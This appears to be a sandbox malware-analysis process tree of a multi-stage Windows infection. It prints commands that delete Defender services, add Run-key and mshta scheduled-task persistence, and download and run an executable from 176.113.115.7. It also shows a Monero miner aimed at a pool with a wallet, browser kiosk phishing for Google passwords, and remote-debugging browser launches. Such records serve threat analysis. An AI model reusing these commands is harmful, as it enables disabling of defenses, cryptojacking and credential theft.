C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:1132
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:1848
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:3652
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:3792
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:1452
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:1204
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:1220
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4620
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:1392
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:2924
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:372
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:2752
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:4528
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1652
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3332
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:908
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:3348
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1812
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1528
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:4852
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3988
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:2852
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3480
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:4048
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4196
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4880
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4512
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4672
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2876
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:452
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:3124
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:4732
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:5084
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:3120
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:4348
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:1740
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:3096
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3832
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4244
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:3452
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"6⤵
- Executes dropped EXE
PID:1884 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s7⤵
- Modifies registry key
PID:1392
-
-
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 8229" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:2732
-
-
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 8229" /t REG_BINARY /d 020000000000000000000000 /f7⤵
- Modifies registry key
PID:4728
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 8229" /t REG_DWORD /d 1 /f7⤵
- Modifies registry key
PID:2828
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318740101\84c9895e7a.exe"C:\Users\Admin\AppData\Local\Temp\10318740101\84c9895e7a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5i19imaw9TS /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5i19imaw9TS /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3796
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220 -
C:\Users\Admin\AppData\Local\TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE"C:\Users\Admin\AppData\Local\TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3788
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:5064 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "86ns3maHsoJ" /tr "mshta \"C:\Temp\BKPOv9yMq.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3412
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\BKPOv9yMq.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3832
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:2444 -
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Users\Admin\AppData\Roaming\winhost\winhost.exeC:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=207⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3304
-
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM winhost.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Users\Admin\AppData\Roaming\winhost\winhost.exeC:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=807⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5076
-
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:6984
-
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:6624
-
-
-
C:\Users\Admin\AppData\Local\Temp\10319000101\5d0ced5341.exe"C:\Users\Admin\AppData\Local\Temp\10319000101\5d0ced5341.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\10319010101\e30a4e2837.exe"C:\Users\Admin\AppData\Local\Temp\10319010101\e30a4e2837.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\10319020101\de9077fc34.exe"C:\Users\Admin\AppData\Local\Temp\10319020101\de9077fc34.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3288 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1756
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1624 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1916 -prefsLen 27099 -prefMapHandle 1920 -prefMapSize 270279 -ipcHandle 1868 -initialChannelId {0c25a936-3923-4e42-9f38-c959b38d2146} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:1580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2436 -prefsLen 27135 -prefMapHandle 2440 -prefMapSize 270279 -ipcHandle 2448 -initialChannelId {7ae24d4f-14eb-49ba-ad9a-37e7afc3fe14} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3852 -prefsLen 25213 -prefMapHandle 3856 -prefMapSize 270279 -jsInitHandle 3860 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3868 -initialChannelId {24ee296c-a020-431c-9a78-4f653f4322dc} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:2976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4060 -prefsLen 27325 -prefMapHandle 4064 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {9469753f-90a4-4401-ba37-a108afe941d2} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:3732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2896 -prefsLen 34824 -prefMapHandle 2900 -prefMapSize 270279 -jsInitHandle 2980 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2932 -initialChannelId {51690dc4-2b45-4fbb-8562-91e159e0c720} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:2760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2584 -prefsLen 35012 -prefMapHandle 3424 -prefMapSize 270279 -ipcHandle 2472 -initialChannelId {019719e5-f733-471c-9cc7-fb2540cc2971} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:5224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5092 -prefsLen 32900 -prefMapHandle 5096 -prefMapSize 270279 -jsInitHandle 5100 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5112 -initialChannelId {790f2635-b3d7-49fa-82de-079ca9d3a3cf} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:5232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5308 -prefsLen 32952 -prefMapHandle 5312 -prefMapSize 270279 -jsInitHandle 5316 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5320 -initialChannelId {4408bbe9-afa6-4996-8f40-a943ae983e17} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:5184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5492 -prefsLen 32952 -prefMapHandle 5496 -prefMapSize 270279 -jsInitHandle 5500 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5508 -initialChannelId {5abaf18c-1cbc-4c6e-8c6b-8c79fc56086b} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:3300
-
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\minidumps\b1b64354-3b48-49d1-948d-a43902cc5099.dmp"9⤵PID:6680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10319030101\ef54ab4fd5.exe"C:\Users\Admin\AppData\Local\Temp\10319030101\ef54ab4fd5.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\10319040101\e96b36abf6.exe"C:\Users\Admin\AppData\Local\Temp\10319040101\e96b36abf6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:1384 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:5504 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff924cddcf8,0x7ff924cddd04,0x7ff924cddd108⤵PID:5552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:28⤵PID:1404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:38⤵PID:372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2360 /prefetch:88⤵PID:5152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:18⤵
- Uses browser remote debugging
PID:5364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3344,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:18⤵
- Uses browser remote debugging
PID:5508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4288 /prefetch:28⤵
- Uses browser remote debugging
PID:2744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3744,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1868 /prefetch:28⤵PID:6536
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:7112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b0,0x7ff90eaff208,0x7ff90eaff214,0x7ff90eaff2208⤵PID:6184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,5418221949656417140,12881634489207284112,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:28⤵PID:6464
-
-
